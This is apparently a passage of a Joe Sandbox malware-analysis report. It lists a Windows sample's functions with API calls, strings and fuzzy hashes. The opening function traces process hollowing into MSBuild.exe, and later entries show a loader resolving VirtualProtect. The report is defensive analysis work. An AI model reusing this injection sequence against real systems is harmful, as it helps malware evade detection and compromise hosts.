Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 006F0365
ReadProcessMemory.KERNELBASE(00000094,?,006F0154,00000004,00000000), ref: 006F0389
VirtualAllocEx.KERNELBASE(00000094,?,?,00003000,00000040), ref: 006F03B4
WriteProcessMemory.KERNELBASE(00000094,00000000,?,?,00000000,?), ref: 006F040C
WriteProcessMemory.KERNELBASE(00000094,00400000,?,?,00000000,?,00000028), ref: 006F0457
WriteProcessMemory.KERNELBASE(00000094,?,?,00000004,00000000), ref: 006F0495
Wow64SetThreadContext.KERNEL32(0000008C,029E0000), ref: 006F04D1
ResumeThread.KERNELBASE(0000008C), ref: 006F04E0

Strings

VirtualAllocEx, xrefs: 006F029C
ReadProcessMemory, xrefs: 006F0289
Load, xrefs: 006F01DA
GetThreadContext, xrefs: 006F0276
aryA, xrefs: 006F01E2
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 006F0333
GetP, xrefs: 006F021E
ress, xrefs: 006F0226
CreateProcessW, xrefs: 006F0250
WriteProcessMemory, xrefs: 006F02AF
SetThreadContext, xrefs: 006F02C2
TerminateProcess, xrefs: 006F03C3
VirtualAlloc, xrefs: 006F0263
ResumeThread, xrefs: 006F02D8

Memory Dump Source

Source File: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: 01d5ece6b7f8144ae36a8b347b20d909941a5762dcbd93cc50d850521a9885f8
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: 5DB10A7664064AAFDB60CF68CC80BEA73A5FF88714F158114EA0CAB342D774FA51CB94

Function 006C1C10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 006C1C3B
CreateFileA.KERNELBASE ref: 006C1C94
GetFileSize.KERNEL32 ref: 006C1CC3
CloseHandle.KERNEL32 ref: 006C1CDF

Strings

CreateFileA, xrefs: 006C1C2E

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: File$AddressCloseCreateHandleProcSize
String ID: CreateFileA
API String ID: 2547132502-1429953656
Opcode ID: 617be803a6b75e076c4b13b3435b25613dc44f9d328e84954180633175b84aab
Instruction ID: 91baa2a37258f921140ddebc381fd2ba2dd5bcd4b2b7fedb82596daafc8be04b
Opcode Fuzzy Hash: 617be803a6b75e076c4b13b3435b25613dc44f9d328e84954180633175b84aab
Instruction Fuzzy Hash: E741C3B09083498FDB00EFA8D4987AEBBF1EF49310F00852DE859AB351D7749549CF92

Function 006C20B0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54
libraryloadersynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 006C20D6
GetProcAddress.KERNEL32 ref: 006C20EE
FreeConsole.KERNELBASE ref: 006C20FD
CreateThread.KERNELBASE ref: 006C213B
WaitForSingleObject.KERNEL32 ref: 006C2155
CloseHandle.KERNEL32 ref: 006C2164

Strings

kernel32.dll, xrefs: 006C20CD
FreeConsole, xrefs: 006C20E1

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: Handle$AddressCloseConsoleCreateFreeModuleObjectProcSingleThreadWait
String ID: FreeConsole$kernel32.dll
API String ID: 1818784962-2564406000
Opcode ID: e6f55ed841a651ae9d1225725dacb2dc4b29647f6c28dd8d7dca5015096d7ad3
Instruction ID: 2796f4e22746039ec1e910edd0490eeb8759645120122c13189ff44bb62eef80
Opcode Fuzzy Hash: e6f55ed841a651ae9d1225725dacb2dc4b29647f6c28dd8d7dca5015096d7ad3
Instruction Fuzzy Hash: 9021A8B09043499FDB40EFB8D98979EBBF1FB44300F40892DE8599B250EB749648CF92

Function 006D62B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,006D63C1,00000000,00000000,00000000,?,?,?,006D603F,00000022,FlsSetValue,006E8AF8,006E8B00,?), ref: 006D6373

Strings

api-ms-, xrefs: 006D6309
ext-ms-, xrefs: 006D631D

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: dd12038cf5e1147218962d83901b3fee0cf8660f8473c434a715f9ed31d21b6b
Instruction ID: 7582bc0679f4c94040c23d1eac16d609c1203fd6d8bb6a84ef2ad1279e6bff75
Opcode Fuzzy Hash: dd12038cf5e1147218962d83901b3fee0cf8660f8473c434a715f9ed31d21b6b
Instruction Fuzzy Hash: FD21EB31E01214E7D7219B65DC45AEE375BAB527A0F162226FD16AB3D1D731ED00C6E0

Function 006D6A9A Relevance: 7.7, APIs: 5, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__alloca_probe_16.LIBCMT ref: 006D6B1F
__alloca_probe_16.LIBCMT ref: 006D6BE8
__freea.LIBCMT ref: 006D6C4F

Part of subcall function 006D5361: RtlAllocateHeap.NTDLL(00000000,006D72E5,?,?,006D72E5,00000220,?,?,?), ref: 006D5393

__freea.LIBCMT ref: 006D6C62
__freea.LIBCMT ref: 006D6C6F

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 3f2d96be243c7f169ddb4c9e8e9ec6f358034618ee56876e53b3d5d6ef301eda
Instruction ID: 9c7e242b89285c7061b3d002a07f5b4f0cfd808715befe883f654b6ad7402c0e
Opcode Fuzzy Hash: 3f2d96be243c7f169ddb4c9e8e9ec6f358034618ee56876e53b3d5d6ef301eda
Instruction Fuzzy Hash: 1151B272A10206AFEB205FA5CC85EFB76ABEF44B50F19002EFD45D6351EB71DC1096A4

Function 006C1DB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 006C1E6E
VirtualProtect.KERNELBASE ref: 006C1EC3

Strings

VirtualProtect, xrefs: 006C1E61
@, xrefs: 006C1EB7

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: AddressProcProtectVirtual
String ID: @$VirtualProtect
API String ID: 3759838892-29487290
Opcode ID: c2fc2dede218def8903817009b4ffc0bf6737dbbaf5250d2e0fca661bd0c053e
Instruction ID: 1a39bf10bc275509c2bb5d5c11549f831b7f46fe989772c777423bf2bddb6e0c
Opcode Fuzzy Hash: c2fc2dede218def8903817009b4ffc0bf6737dbbaf5250d2e0fca661bd0c053e
Instruction Fuzzy Hash: 3D41D2B0900209DFDB04DFA9D998AAEBBF1FF48304F10841EE848AB351D775A944CF85

Function 006CF2F3 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(006CF200,?,006CF3B5,00000000,?,?,006CF200,6BA95F62,?,006CF200), ref: 006CF304
TerminateProcess.KERNEL32(00000000,?,006CF3B5,00000000,?,?,006CF200,6BA95F62,?,006CF200), ref: 006CF30B
ExitProcess.KERNEL32 ref: 006CF31D

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 71ec827406b1d5a5a09974b351bf5840ff27d8ad5b250bbd28fde8b158ab5df3
Instruction ID: 85a9f1c0351216cdeb98ff5ed73d09545d5ff605cab486fd2c73ab489cedb53d
Opcode Fuzzy Hash: 71ec827406b1d5a5a09974b351bf5840ff27d8ad5b250bbd28fde8b158ab5df3
Instruction Fuzzy Hash: A7D09E31000288BFCF413FA1DC4DDA93F6BEF443417445028B90949172CB76D952DB94

Function 006DD014 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006DD3BE: GetConsoleOutputCP.KERNEL32(6BA95F62,00000000,00000000,?), ref: 006DD421

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,006CD892,?,006CDAF4), ref: 006DD199
GetLastError.KERNEL32(?,006CD892,?,006CDAF4,?,006CDAF4,?,?,?,?,?,?,?,?,?,?), ref: 006DD1A3

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: bac911799e68f97e8e72c08ab38b599b9014e339bdec150e8831f0c426f7d065
Instruction ID: 4d3eb77ea00f9a83288065f54ee749f10dcba8929a31bb4780010825d60a3c6a
Opcode Fuzzy Hash: bac911799e68f97e8e72c08ab38b599b9014e339bdec150e8831f0c426f7d065
Instruction Fuzzy Hash: 906182B1D00119AFDF11EFA8DC84AEEBBBAAF59304F15014AE904A7352D376D942CB90

Function 006D6F18 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006D711D: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 006D7148

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,006D7328,?,00000000,?,?,?), ref: 006D6F79
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,006D7328,?,00000000,?,?,?), ref: 006D6FB5

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: b75b976de664dda8135582f009678d8bedff3a4eb5640a07ebab261e7b8e0fa9
Instruction ID: 41703472429f1d8e4ecb13629d04649db8ace2cba4c83951a73722c42082d781
Opcode Fuzzy Hash: b75b976de664dda8135582f009678d8bedff3a4eb5640a07ebab261e7b8e0fa9
Instruction Fuzzy Hash: 1B5127B0D042458EDB21CF36C881AFABBF7EF55304F18446FD0868B391E6759946CB92

Function 006DD7ED Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,006DD17F,?,006CDAF4,?,?,?,00000000), ref: 006DD889
GetLastError.KERNEL32(?,006DD17F,?,006CDAF4,?,?,?,00000000,?,?,?,?,?,006CD892,?,006CDAF4), ref: 006DD8AF

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 6cc35d8170422d15ef8ec2eca7995a1ec9bffe3dbd969349547d3ddea95d709c
Instruction ID: 5f50bc3c0babb97fba6c50054668b4b3467fbd81e0cba7cd2d4a6450dbdb2911
Opcode Fuzzy Hash: 6cc35d8170422d15ef8ec2eca7995a1ec9bffe3dbd969349547d3ddea95d709c
Instruction Fuzzy Hash: B1218030E002189BDB16DF19DC80AE9B7BAEB58305F1441AAE906D7351D6309E42CBA4

Function 006D6E02 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,006D6CF1,006EFD38,0000000C), ref: 006D6E4E
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,006D6CF1,006EFD38,0000000C), ref: 006D6E60

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 802f6acf3136f9f82a9f08aecc203b01f8c2a21eb9f402aa91ddb37c767b6197
Instruction ID: 97bb598c3e8df3a97bbd441825d93122fb9b657f5116d7c65079210807c3c6c5
Opcode Fuzzy Hash: 802f6acf3136f9f82a9f08aecc203b01f8c2a21eb9f402aa91ddb37c767b6197
Instruction Fuzzy Hash: 821184799087518ACB304E3ECC88662BB97AB96370B38071BF0B6867F1C774D886D241

Function 006D6163 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,006D6B8A,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 006D6197
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,006D6B8A,?,?,-00000008,?,00000000), ref: 006D61B5

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 8c7f16b927388f60ef92bdd4fb6308ba1fb90ba6a3ca87bdd4d4a02820fb8c1e
Instruction ID: e20b4c5c1a40951afc27804d3e7aff4debabbe29aae058c0a4795b041cce1c56
Opcode Fuzzy Hash: 8c7f16b927388f60ef92bdd4fb6308ba1fb90ba6a3ca87bdd4d4a02820fb8c1e
Instruction Fuzzy Hash: 57F07A3280025ABBCF126F94DC05DDE3F67FF48360F058415FA1825221CB32C831AB90

Function 006C2010 Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 006C2038
GetModuleFileNameA.KERNEL32 ref: 006C2058

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: Module$FileHandleName
String ID:
API String ID: 4146042529-0
Opcode ID: 51daf804a48afb3dd16050545bb544fd8a47a878efc0a2fb46fe87d4b8558c21
Instruction ID: 8c6036eae1b48a1fbf3a0bfa08b82b1de12361b18b8d2e8e0f881431d703cc6d
Opcode Fuzzy Hash: 51daf804a48afb3dd16050545bb544fd8a47a878efc0a2fb46fe87d4b8558c21
Instruction Fuzzy Hash: 3401FFB09082088FC744EF74D9856EDBBF5EB15300F4084ADE4C9D7241EB749688CF86

Function 006D5327 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,006D96D4,?,00000000,?,?,006D9374,?,00000007,?,?,006D9CBA,?,?), ref: 006D533D
GetLastError.KERNEL32(?,?,006D96D4,?,00000000,?,?,006D9374,?,00000007,?,?,006D9CBA,?,?), ref: 006D5348

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: ee42e230e1fe6a9a66a3bd81aca4a39392bf451b2eaef83aab4fd4c243b044fa
Instruction ID: ffdbc2f607609bafd215d4325145d79d22a6a64895ee56b4ddb6c25f1c0835ae
Opcode Fuzzy Hash: ee42e230e1fe6a9a66a3bd81aca4a39392bf451b2eaef83aab4fd4c243b044fa
Instruction Fuzzy Hash: FFE0CD32900744F7CB112FA0ED0DBE93B9B9B423D1F051116F6098EB71E7B19850C785

Function 006C14C0 Relevance: 1.8, APIs: 1, Instructions: 308COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 006C150B

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: bd6cb2db3d1151ea03739bb6a0cb07a048d1bde5d5b4e40a22bbbc2760c83fe3
Instruction ID: a79cf050e4b61914794fb4860d93f9e88eca42df25043f76e686dec5b7996b7a
Opcode Fuzzy Hash: bd6cb2db3d1151ea03739bb6a0cb07a048d1bde5d5b4e40a22bbbc2760c83fe3
Instruction Fuzzy Hash: 87D12274604B408FC764DF29C594BB6BBE2FF4A318B008A1DE8878BB92D734E905CB55

Function 006D74A7 Relevance: 1.6, APIs: 1, Instructions: 142COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000083,?,00000005,006D7328,?), ref: 006D74D9

Memory Dump Source

Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: fa3b2d9600a3c9edaeca9101c4366fb2073093ab4beb699698a431aa0669c945
Instruction ID: 52838fe74dd48ee929227bcee4e248aa2b00376eccd05449eb22de03a33de7cb
Opcode Fuzzy Hash: fa3b2d9600a3c9edaeca9101c4366fb2073093ab4beb699698a431aa0669c945
